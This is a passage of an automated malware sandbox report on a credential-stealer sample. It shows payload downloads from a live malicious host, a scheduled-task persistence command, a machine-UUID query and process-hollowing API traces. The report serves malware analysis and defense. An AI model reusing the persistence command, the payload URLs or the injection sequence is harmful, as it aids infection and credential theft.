                            2024-07-27 09:37:17 UTC | 319 | IN | Data Ascii: { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone": "


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            3 | 192.168.2.9 | 49710 | 104.21.65.79 | 443 | 8060 | C:\Users\user\AppData\Roaming\WareHouse.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2024-07-27 09:37:19 UTC | 136 | OUT | GET /assuence/litesolidCha/Victim_SID.bd HTTP/1.1
                            User-Agent: Mozilla/5.0
                            Host: investdirectinsurance.com
                            Cache-Control: no-cache
                            2024-07-27 09:37:19 UTC | 677 | IN | HTTP/1.1 200 OK
                            Date: Sat, 27 Jul 2024 09:37:19 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 47616
                            Connection: close
                            etag: "ba00-66a2ddbd-31025;;;"
                            last-modified: Thu, 25 Jul 2024 23:20:29 GMT
                            accept-ranges: bytes
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4%2F0JilD9ueh7OBgiEH6vbKuueED8tp8vnBKIGnAKZ2qwEdKuD8rNvCmZfnB9zw7W%2BRoKkTUkbSaUPvE3qhja82HuDiBsFngjRWlejuc0PXIftBlfi8EOPonGtD0Jb3goyzCrf2d6RGykUQLr"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8a9ba6702b6cc411-EWR
                            alt-svc: h3=":443"; ma=86400


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            4 | 192.168.2.9 | 49711 | 104.21.65.79 | 443 | 8060 | C:\Users\user\AppData\Roaming\WareHouse.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2024-07-27 09:37:20 UTC | 130 | OUT | GET /assuence/litesolidCha/Miox.bd HTTP/1.1
                            User-Agent: Mozilla/5.0
                            Host: investdirectinsurance.com
                            Cache-Control: no-cache
                            2024-07-27 09:37:20 UTC | 677 | IN | HTTP/1.1 200 OK
                            Date: Sat, 27 Jul 2024 09:37:20 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 549888
                            Connection: close
                            etag: "86400-66a37fb9-2699a;;;"
                            last-modified: Fri, 26 Jul 2024 10:51:37 GMT
                            accept-ranges: bytes
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4GbqXBhQ2tCBNPiJpzk6ony8XJlrQFr99kXDtsLbggEiev5RNEhvSULnic0XHUGtipIKSnFAdri73kRmv1XWxlJCRdWECBwIL63fgz%2B5IUxk2HV6kyQuPB0LNBdl24Ns8kBE7jRaEUfF1FaA"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8a9ba6776db8437a-EWR
                            alt-svc: h3=":443"; ma=86400


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            5 | 192.168.2.9 | 49712 | 34.117.59.81 | 443 | 1272 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2024-07-27 09:37:22 UTC | 63 | OUT | GET /json HTTP/1.1
                            Host: ipinfo.io
                            Connection: Keep-Alive
                            2024-07-27 09:37:23 UTC | 345 | IN | HTTP/1.1 200 OK
                            access-control-allow-origin: *
                            Content-Length: 319
                            content-type: application/json; charset=utf-8
                            date: Sat, 27 Jul 2024 09:37:23 GMT
                            x-content-type-options: nosniff
                            via: 1.1 google
                            strict-transport-security: max-age=2592000; includeSubDomains
                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                            Connection: close
                            2024-07-27 09:37:23 UTC | 319 | IN | Data Ascii: { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone": "



                            Target ID:0
                            Start time:05:37:11
                            Start date:27/07/2024
                            Path:C:\Users\user\Desktop\Mu7iyblZk8.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\Desktop\Mu7iyblZk8.exe"
                            Imagebase:0x990000
                            File size:79'872 bytes
                            MD5 hash:74F11A170C0A518CE076AE43F70A7C06
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1404853569.0000000012C88000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            Target ID:3
                            Start time:05:37:15
                            Start date:27/07/2024
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                            Imagebase:0x4a0000
                            File size:262'432 bytes
                            MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3816380121.0000000002814000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:high
                            Has exited:false

                            Target ID:4
                            Start time:05:37:15
                            Start date:27/07/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"cmd.exe" /c schtasks /create /tn "WareHouse" /tr "C:\Users\user\AppData\Roaming\WareHouse.exe " /sc minute /mo 6 /f
                            Imagebase:0x7ff6b8e00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:5
                            Start time:05:37:15
                            Start date:27/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff70f010000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:6
                            Start time:05:37:15
                            Start date:27/07/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks /create /tn "WareHouse" /tr "C:\Users\user\AppData\Roaming\WareHouse.exe " /sc minute /mo 6 /f
                            Imagebase:0x7ff763430000
                            File size:235'008 bytes
                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:7
                            Start time:05:37:16
                            Start date:27/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff70f010000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:8
                            Start time:05:37:17
                            Start date:27/07/2024
                            Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                            Wow64 process (32bit):true
                            Commandline:"wmic" csproduct get UUID
                            Imagebase:0xfc0000
                            File size:427'008 bytes
                            MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:9
                            Start time:05:37:17
                            Start date:27/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff70f010000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:10
                            Start time:05:37:17
                            Start date:27/07/2024
                            Path:C:\Users\user\AppData\Roaming\WareHouse.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Users\user\AppData\Roaming\WareHouse.exe
                            Imagebase:0xa50000
                            File size:79'872 bytes
                            MD5 hash:74F11A170C0A518CE076AE43F70A7C06
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 37%, ReversingLabs
                            • Detection: 24%, Virustotal, Browse
                            Reputation:low
                            Has exited:true

                            Target ID:11
                            Start time:05:37:21
                            Start date:27/07/2024
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                            Imagebase:0xa40000
                            File size:262'432 bytes
                            MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.3813836224.0000000000423000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.3816272759.0000000002C14000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:high
                            Has exited:false

                            Target ID:12
                            Start time:05:37:22
                            Start date:27/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff70f010000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:13
                            Start time:05:37:23
                            Start date:27/07/2024
                            Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                            Wow64 process (32bit):true
                            Commandline:"wmic" csproduct get UUID
                            Imagebase:0xfc0000
                            File size:427'008 bytes
                            MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:14
                            Start time:05:37:23
                            Start date:27/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff70f010000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true


                              Execution Graph

                              Execution Coverage:24.8%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:11.1%
                              Total number of Nodes:27
                              Total number of Limit Nodes:0

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 101 7ff886e1166f-7ff886e11715 104 7ff886e1173e-7ff886e117cb InternetReadFile 101->104 105 7ff886e11717-7ff886e1173b 101->105 106 7ff886e117cd 104->106 107 7ff886e117d3-7ff886e11833 104->107 105->104 106->107
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1412146562.00007FF886E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff886e10000_Mu7iyblZk8.jbxd
                              Similarity
                              • API ID: FileInternetRead
                              • String ID:
                              • API String ID: 778332206-0
                              • Opcode ID: 3886dd087334cc2ae9e2352b8b53b5f6efabdedb2f79e5b7834deee4273abc6b
                              • Instruction ID: 70055b8bb701cf57ef533e59578262dc057120a75803053d826013e4aadd5198
                              • Opcode Fuzzy Hash: 3886dd087334cc2ae9e2352b8b53b5f6efabdedb2f79e5b7834deee4273abc6b
                              • Instruction Fuzzy Hash: 15510670918A1C8FDB58DF98C889BE9BBF0FB69311F1041AED449A3251DB70A985CF81

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1412146562.00007FF886E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff886e10000_Mu7iyblZk8.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0
                              • Opcode ID: e39d512da5c669d1782c63fae5b159645cc2d92221c4a3e2bc130d0b6aa25420
                              • Instruction ID: f18f4ed920f184ba9a8e68c466f76f35d6e3e165d1c7491aca92a5081cb7a6aa
                              • Opcode Fuzzy Hash: e39d512da5c669d1782c63fae5b159645cc2d92221c4a3e2bc130d0b6aa25420
                              • Instruction Fuzzy Hash: C4F16070918A8D8FDBB8DF18C895BF977E1FB59351F10412AD80ECB291DB74AA44CB81

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1412146562.00007FF886E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff886e10000_Mu7iyblZk8.jbxd
                              Similarity
                              • API ID: InternetOpen
                              • String ID:
                              • API String ID: 2038078732-0
                              • Opcode ID: 2e6c87f4d74d42236021fa64dd96554c8f30964d3e2c79dd9c50b523591e71ae
                              • Instruction ID: 482b0afffbfc9c321a5df607403bb44a70531f5af2876e2cd837cdb9e37c1959
                              • Opcode Fuzzy Hash: 2e6c87f4d74d42236021fa64dd96554c8f30964d3e2c79dd9c50b523591e71ae
                              • Instruction Fuzzy Hash: 3E712470908A5C8FDB98EF58C894BE9BBF1FB69311F1001AED00EE3651DB75A980CB41

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1412146562.00007FF886E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff886e10000_Mu7iyblZk8.jbxd
                              Similarity
                              • API ID: InternetOpen
                              • String ID:
                              • API String ID: 2038078732-0
                              • Opcode ID: 9fc28fb10e32150d2af40d77592148ef6b2a4442857c5f4f3f1fd7ddc226e354
                              • Instruction ID: 880b0e9b41a2214c14462cd7692e1ba86eeed2145b2704a57d3018e20466b7ef
                              • Opcode Fuzzy Hash: 9fc28fb10e32150d2af40d77592148ef6b2a4442857c5f4f3f1fd7ddc226e354
                              • Instruction Fuzzy Hash: F571F070908A1D8FDB98EF58C858BE9BBF1FB69311F1041AED00EE3651DB75A981CB41

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1412146562.00007FF886E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff886e10000_Mu7iyblZk8.jbxd
                              Similarity
                              • API ID: MemoryProcessWrite
                              • String ID:
                              • API String ID: 3559483778-0
                              • Opcode ID: cc739809153f4042353ac43dad5a2707347c4223baa5fbeab3e6c05e324b266c
                              • Instruction ID: ca484339e9306912b3283ec48e327a5845af54aa5c6d972d9cf3ab4e31d9e7fc
                              • Opcode Fuzzy Hash: cc739809153f4042353ac43dad5a2707347c4223baa5fbeab3e6c05e324b266c
                              • Instruction Fuzzy Hash: 91612770D08A1D8FDB94DF58C885BE9BBF1FB69311F1082AAD04CE3251CB74A985CB40

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 90 7ff886e160c5-7ff886e160d1 91 7ff886e160dc-7ff886e16219 VirtualAllocEx 90->91 92 7ff886e160d3-7ff886e160db 90->92 97 7ff886e1621b 91->97 98 7ff886e16221-7ff886e1628d 91->98 92->91 97->98
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1412146562.00007FF886E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff886e10000_Mu7iyblZk8.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: c2281a795387c9d26f76a08a75cae996b7c5c4b72f4c2499573b8b22251ab891
                              • Instruction ID: ff3a2d925ab0c0e2a5945c3e9989a4262fbb6ed3c451136da2d5e813c55f2b8c
                              • Opcode Fuzzy Hash: c2281a795387c9d26f76a08a75cae996b7c5c4b72f4c2499573b8b22251ab891
                              • Instruction Fuzzy Hash: C1513970908A1C8FDF94EF58C845BE9BBF0FB6A310F1041AAD04CE3251CB75A985CB81

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 110 7ff886e1649d-7ff886e164a9 111 7ff886e164ab-7ff886e164b3 110->111 112 7ff886e164b4-7ff886e165ef ReadProcessMemory 110->112 111->112 117 7ff886e165f1 112->117 118 7ff886e165f7-7ff886e16659 112->118 117->118
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1412146562.00007FF886E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff886e10000_Mu7iyblZk8.jbxd
                              Similarity
                              • API ID: MemoryProcessRead
                              • String ID:
                              • API String ID: 1726664587-0
                              • Opcode ID: 4fd3ce9adbc6dbd911e4ff624ff5e22ad633bc5eabcb684fc08eb326eb66e329
                              • Instruction ID: dbbfaf80a2029091f11adcc66f659f97d91aa2f95b1764e51bcbbd8fdb2b470b
                              • Opcode Fuzzy Hash: 4fd3ce9adbc6dbd911e4ff624ff5e22ad633bc5eabcb684fc08eb326eb66e329
                              • Instruction Fuzzy Hash: 55513770D08A5C8FDB94DF98C885BE9BBF1FB69310F1081AAD44CE3252DB34A985CB41

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 121 7ff886e15dce-7ff886e15ddb 122 7ff886e15ddd-7ff886e15de5 121->122 123 7ff886e15de6-7ff886e15ea2 121->123 122->123 127 7ff886e15ec4-7ff886e15f26 Wow64SetThreadContext 123->127 128 7ff886e15ea4-7ff886e15ec1 123->128 130 7ff886e15f28 127->130 131 7ff886e15f2e-7ff886e15f84 127->131 128->127 130->131
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1412146562.00007FF886E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff886e10000_Mu7iyblZk8.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0
                              • Opcode ID: f46d55cdcf1f6b1bdfc50f202d2a30c417a0a0278597fb56e02008577a833340
                              • Instruction ID: 5e61efdde9f04e63297b85c5f10145d85ad09ef0182c3aae58a3b9818ac3d460
                              • Opcode Fuzzy Hash: f46d55cdcf1f6b1bdfc50f202d2a30c417a0a0278597fb56e02008577a833340
                              • Instruction Fuzzy Hash: 06516A70D0864D8FEB95DFA8C845BEDBBB1FB6A311F1482AAD048D7256CB749885CB40

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 134 7ff886e15faf-7ff886e16070 ResumeThread 138 7ff886e16078-7ff886e160c2 134->138 139 7ff886e16072 134->139 139->138
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1412146562.00007FF886E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff886e10000_Mu7iyblZk8.jbxd
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: 9a24c10dbbaa58923c289d7ded27bbe3cb54679ee994f441ad4e52fed49f47cb
                              • Instruction ID: 06a0e492b65611d3c67f7f9a715e4876d3d803a4eef66801249f6555225409b3
                              • Opcode Fuzzy Hash: 9a24c10dbbaa58923c289d7ded27bbe3cb54679ee994f441ad4e52fed49f47cb
                              • Instruction Fuzzy Hash: EC410770D0860C8FDB98EF98D885AEDBBF0FB59310F10416AD409E7252DA75A985CF41

                              Execution Graph

                              Execution Coverage:16.8%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:17.2%
                              Total number of Nodes:598
                              Total number of Limit Nodes:55

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 4e684a0-4e684cb 1 4e684d2-4e6850a 0->1 2 4e684cd 0->2 4 4e6850c-4e68515 1->4 5 4e6851a-4e68552 1->5 2->1 6 4e691c4-4e691d0 4->6 9 4e68554-4e6855d 5->9 10 4e68562-4e68572 5->10 9->6 128 4e68578 call 4e69ab8 10->128 129 4e68578 call 4e69aa9 10->129 12 4e6857e-4e68592 130 4e68594 call 4e69f68 12->130 131 4e68594 call 4e69f59 12->131 13 4e6859a-4e685ad 14 4e685b5-4e6863a 13->14 15 4e685af-4e685b0 13->15 53 4e68644-4e6864a 14->53 16 4e68655-4e6867b 15->16 18 4e68694-4e68768 16->18 19 4e6867d-4e6868f 16->19 20 4e6876e-4e687c9 18->20 19->20 26 4e687cb-4e687e3 20->26 27 4e687e8-4e688be 20->27 28 4e688c4-4e68911 26->28 27->28 35 4e68917-4e68936 28->35 36 4e68cbc-4e68cda 28->36 39 4e68955-4e68a5e 35->39 40 4e68938-4e68950 35->40 38 4e68ce0-4e68d0e 36->38 50 4e68d14-4e68d1c 38->50 51 4e691b9-4e691c2 38->51 43 4e68a64-4e68ab4 39->43 40->43 47 4e68ab6-4e68af2 43->47 48 4e68af7-4e68bc6 43->48 52 4e68c3b-4e68c8a 47->52 109 4e68bd2-4e68c35 48->109 56 4e68d24-4e68dac 50->56 57 4e68d1e-4e68d1f 50->57 51->6 71 4e68c8f-4e68cba 52->71 53->16 60 4e68db7-4e68def 56->60 57->60 64 4e68df1-4e68e09 60->64 65 4e68e0e-4e68f08 60->65 70 4e68f0e-4e68f52 64->70 65->70 75 4e68f54-4e68f84 70->75 76 4e68f89-4e6909b 70->76 71->38 80 4e690a1-4e6919c 75->80 76->80 126 4e691a4-4e691b7 80->126 109->52 126->6 128->12 129->12 130->13 131->13
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID: #$S$T
                              • API String ID: 0-2617736706
                              • Opcode ID: 7819527c2f80576fb667a224a9a83830d100298de3699afe1fc41e3845285fd8
                              • Instruction ID: e3aa4a7551dd75424d15431383d0a5d9d9a5cb95378deb165bb3c40be3ebab8d
                              • Opcode Fuzzy Hash: 7819527c2f80576fb667a224a9a83830d100298de3699afe1fc41e3845285fd8
                              • Instruction Fuzzy Hash: 42826174E012298FDB65DF65C984BD9BBB2BB89300F1081EAD809A7355DB35AE81CF50

                              Control-flow Graph

                              [Control-flow graph, first block 4e66a50-4e66a70; blocks reference LdrInitializeThunk; node and edge listing not reproduced]
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 30f748a467be9dd83729ffd8f164ea66285d805422f0fb52f2ffac757851a5e1
                              • Instruction ID: 5d70adccbd7d0df0ed5f61dbe24f7523c6a1bda9a9cdb7d23e603a0ab38ab954
                              • Opcode Fuzzy Hash: 30f748a467be9dd83729ffd8f164ea66285d805422f0fb52f2ffac757851a5e1
                              • Instruction Fuzzy Hash: 90B19F74E41218CFDB14DFAAC884ADDBBF6BF89304F149069D40AAB355DB746985CF10

                              Control-flow Graph

                              [Control-flow graph, first block 4e6aa60-4e6aa98; blocks reference LdrInitializeThunk; node and edge listing not reproduced]
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 673f8115a0cc2a034a33cbadfb15aee4557487f7c79c309ed5e5063fd1141f57
                              • Instruction ID: efcaadfcb2c76c1e3635177ce35e9d375b89453f35ade9865221269706c11b3f
                              • Opcode Fuzzy Hash: 673f8115a0cc2a034a33cbadfb15aee4557487f7c79c309ed5e5063fd1141f57
                              • Instruction Fuzzy Hash: CEC1E174E00218CFDB18DFA9C984B9DFBB2BF8A304F249169D409BB255DB34A985CF54

                              Control-flow Graph

                              [Control-flow graph, first block 4e62098-4e620b2; blocks reference LdrInitializeThunk; node and edge listing not reproduced]
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 4f041f836063b6aa2fb6b4a5b2910c9290069ceab0d32d964a9710d298f70a8a
                              • Instruction ID: 247d504566a878ede2098a899ce5df34bf63e8b4d3399746c021b29f584aa768
                              • Opcode Fuzzy Hash: 4f041f836063b6aa2fb6b4a5b2910c9290069ceab0d32d964a9710d298f70a8a
                              • Instruction Fuzzy Hash: 1471CF74E04218CFDB18DFAAD584A9EFBF2BF89300F24D169D509AB255DB34A842CF54

                              Control-flow Graph

                              [Control-flow graph, first block 5b3eae8-5b3eb11; node and edge listing not reproduced]
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b30000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID: @
                              • API String ID: 0-2766056989
                              • Opcode ID: 2d414db6e9f98d5f2b822ff90eac692761ad767b4b7dd0036c69850317474d79
                              • Instruction ID: 0d375472707d0932e25c66e31318b112e78f72332ae74227b97adc0cd53b7865
                              • Opcode Fuzzy Hash: 2d414db6e9f98d5f2b822ff90eac692761ad767b4b7dd0036c69850317474d79
                              • Instruction Fuzzy Hash: D7024D71A00205DFDB29DF74C495AAE7BB6FF89304F1484A9E406AB391DB35ED42CB90

                              Control-flow Graph

                              [Control-flow graph, first block 4e66a40-4e66a70; blocks reference LdrInitializeThunk; node and edge listing not reproduced]
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: b6996f32075dd5dcc3ce127e2cfa654103eebf8eacf6a17267489d38fea5c441
                              • Instruction ID: 23d639a2b9f32d09cc5d96f8a66c3842dae783412bca9acd6e6f3067e8229a42
                              • Opcode Fuzzy Hash: b6996f32075dd5dcc3ce127e2cfa654103eebf8eacf6a17267489d38fea5c441
                              • Instruction Fuzzy Hash: 5161BEB5E01318CFDB18DFAAC84469DBBF6BF89304F14906AD409AB355EB346945CF00
                              APIs
                              • NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,?,?), ref: 0261D173
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID: Memory64ReadVirtualWow64
                              • String ID:
                              • API String ID: 3357887247-0
                              • Opcode ID: 7b23ea04a3256c1c835d716bb73ea4d15b27a1355aa8e717242112204199886a
                              • Instruction ID: b822ce8970c2acc937775e8eeea73cfadc480e26219601c458833426c99aa018
                              • Opcode Fuzzy Hash: 7b23ea04a3256c1c835d716bb73ea4d15b27a1355aa8e717242112204199886a
                              • Instruction Fuzzy Hash: 864178B9D002489FDF00CFA9D980A9EFBB1BB09310F24902AE818BB310D335A945CF54
                              APIs
                              • NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,?,?), ref: 0261D173
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
